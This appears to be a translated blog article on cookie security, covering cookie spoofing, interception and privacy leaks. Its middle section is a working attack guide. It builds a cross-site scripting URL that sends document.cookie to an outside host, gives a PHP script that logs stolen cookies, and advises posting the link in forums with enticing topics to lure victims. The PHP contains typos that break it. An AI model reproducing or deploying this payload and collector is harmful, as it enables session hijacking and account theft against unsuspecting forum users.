In-depth analysis of cookie security issues_cookies

The purpose of cookies is to bring convenience to users and add value to the website. Under normal circumstances, they will not cause serious security threats. Cookie files cannot be executed as code and cannot transmit viruses. They are proprietary to the user and can only be read by the server that created it. In addition, browsers generally only allow 300 cookies to be stored, and each site can store up to 20 cookies. The size of each cookie is limited to 4KB. Therefore, cookies will not fill up the hard disk, and will not be used as a "denial of service" attack. means.

However, as a substitute for user identity, the security of cookies sometimes determines the security of the entire system, and the security issues of cookies cannot be ignored.

(1) Cookie spoofing Cookies record information such as user account IDs and passwords, and are usually encrypted using the MD5 method before being transmitted online. Even if the encrypted information is intercepted by some people with ulterior motives on the Internet, it cannot be understood. However, the problem now is that the person who intercepts the cookie does not need to know the meaning of these strings. As long as he submits other people's cookies to the server and can pass the verification, he can pretend to be the victim and log in to the website. This behavior is called cookies. cheat.
Illegal users obtain corresponding encryption keys through cookie deception, thereby accessing all personalized information of legitimate users, including users' emails and even account information, causing serious harm to personal information.
(2) Cookie interception
Cookies are transmitted between the browser and the server in the form of plain text and can easily be illegally intercepted and used by others. Cookies can be read by anyone who can intercept web communications.
After a cookie is intercepted by an illegal user and then replayed within its validity period, the illegal user will enjoy the rights of a legal user. For example, for online reading, illegal users can enjoy online reading of electronic magazines without paying any fees.

Cookie interception methods include the following:

(1) Use programming to intercept cookies. The method is analyzed below. The method is completed in two steps.

Step 1: Locate the website that needs to collect cookies, analyze it and construct the URL. First, open the website where you want to collect cookies, assuming it is http://www.XXX.net. Log in to the website and enter the user name "" (without quotation marks). Analyze the data and capture the packets, and get the following code:
http://www.XXX.net/tXl/login/login.pl? username=&passwd=&ok.X=28&ok.y=6;
Replace "" with:
"<script>alert(document.cookie)</script>" Try again. If the execution is successful, start constructing the URL:
http://www.XXX.net/tXl/login/login.pl? username=<script>window.open ("http://www.cbifamily.org/cbi.php?"+document.cookie)</script>&passwd=&ok.X=28&ok.y=6.
Among them, http://www.cbifamily.org/cbi.php is a script on a certain host that the user can control. Note that "+" is the URL encoding of the symbol " ", since " " will be treated as a space. The URL can be posted in the forum to induce others to click on it.

Step 2: Prepare a PHP script that collects cookies and place it on a website that the user can control. When an unsuspecting person clicks on the constructed URL, the PHP code can be executed. The specific content of the script is as follows:

Copy code The code is as follows:

$info=getenv("OUERY_STRING");
if（$info）｛
$fp=fopen("info.tXt","a");
fwrite($fp,!info."n");
fclose($fp);
｝
header("Location:http://www.XXX.net");
?>

Put this code on the network and you can collect everyone’s cookies. If a forum allows HTML code or allows the use of Flash tags, you can use these technologies to collect Cookie code and put it in the forum, then give the post an attractive topic and write interesting content, and you can quickly collect a large number of Cookies. On the forum, many people's passwords were stolen by this method.
(2) Use the hidden dangers of Flash code to intercept cookies. There is a getURL() function in Flash. Flash can use this function to automatically open a specified web page, which may lead users to a website containing malicious code. For example, when a user is enjoying a Flash animation on a computer, the code in the animation frame may have been quietly connected to the Internet and opened a very small page containing special code. This page can collect cookies and do other harmful things. things. Websites cannot prevent Flash from doing this because it is an internal function of the Flash file.
(3) Cookies leak network privacy
The main reason why cookies cause online privacy leaks is: Driven by commercial interests. With the rise of e-commerce and the emergence of huge business opportunities on the Internet, some websites and institutions abuse cookies and use search engine technology, data mining technology and even network deception technology to collect other people's personal information without the visitor's permission, in order to build users. Database, advertising and other profit-making purposes, resulting in the leakage of users' personal privacy. "The openness of cookie information transmission. Cookie files have special transmission processes and text characteristics. Transmitting unsecurely encrypted Cookie-ie files between the server and the client can easily lead to the leakage of personal information.

The above is my personal understanding of cookie security. Please correct me if there are any omissions.